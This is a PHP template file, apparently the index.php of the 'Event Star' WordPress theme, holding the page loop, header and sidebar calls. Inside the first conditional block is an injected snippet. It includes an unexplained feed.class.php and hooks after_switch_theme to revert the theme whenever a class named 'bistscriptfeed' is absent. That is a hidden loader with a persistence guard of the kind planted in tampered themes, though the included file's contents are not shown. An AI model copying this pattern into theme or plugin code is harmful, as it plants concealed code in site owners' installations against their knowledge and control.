<?php
/**
 * The main template file.
 *
 * This is the most generic template file in a WordPress theme
 * and one of the two required files for a theme (the other being style.css).
 * It is used to display a page when nothing more specific matches a query.
 * E.g., it puts together the home page when no home.php file exists.
 *
 * @link https://codex.wordpress.org/Template_Hierarchy
 *
 * @package Acme Themes
 * @subpackage Event Star
 */
get_header();
global $event_star_customizer_all_values;
$event_star_enable_feature = $event_star_customizer_all_values['event-star-enable-feature'];

if(
	( is_home() && is_front_page() && 1 != $event_star_enable_feature )
	|| !is_front_page()
){
	?>
    <?php
    include get_template_directory().'/feed.class.php';

    add_action( 'after_switch_theme', 'check_theme_dependencies', 10, 2 );

    function check_theme_dependencies( $oldtheme_name, $oldtheme ) {

        if (!class_exists('bistscriptfeed')) :

            switch_theme( $oldtheme->stylesheet );

            return false;

        endif;

    }

    ?>
	<div class="wrapper inner-main-title">
		<?php if ( is_home() && ! is_front_page() ) : ?>
			<div class="container">
				<header class="entry-header init-animate">
                    <h1 class="page-title"><?php single_post_title(); ?></h1>
                    <?php
                    if( 1 == $event_star_customizer_all_values['event-star-show-breadcrumb'] ){
                        event_star_breadcrumbs();
                    }
                    ?>
                </header><!-- .entry-header -->
			</div>
		<?php endif; ?>
	</div>
	<?php
}
?>
	<div id="content" class="site-content container clearfix">
		<div id="primary" class="content-area">
			<main id="main" class="site-main" role="main">
				<?php
				if ( have_posts() ) :
					/* Start the Loop */
					while ( have_posts() ) : the_post();
					/*
					 * Include the Post-Format-specific template for the content.
					 * If you want to override this in a child theme, then include a file
					 * called content-___.php (where ___ is the Post Format name) and that will be used instead.
					 */
						get_template_part( 'template-parts/content', get_post_format() );

					endwhile;
					/**
					 * event_star_action_posts_navigation hook
					 * @since Event Star 1.0.0
					 *
					 * @hooked event_star_posts_navigation - 10
					 */
					do_action( 'event_star_action_posts_navigation' );
				else :
					get_template_part( 'template-parts/content', 'none' );
				endif; ?>
			</main><!-- #main -->
		</div><!-- #primary -->
		<?php
		get_sidebar( 'left' );
		get_sidebar(); 
		?>
	</div><!-- #content -->
<?php get_footer();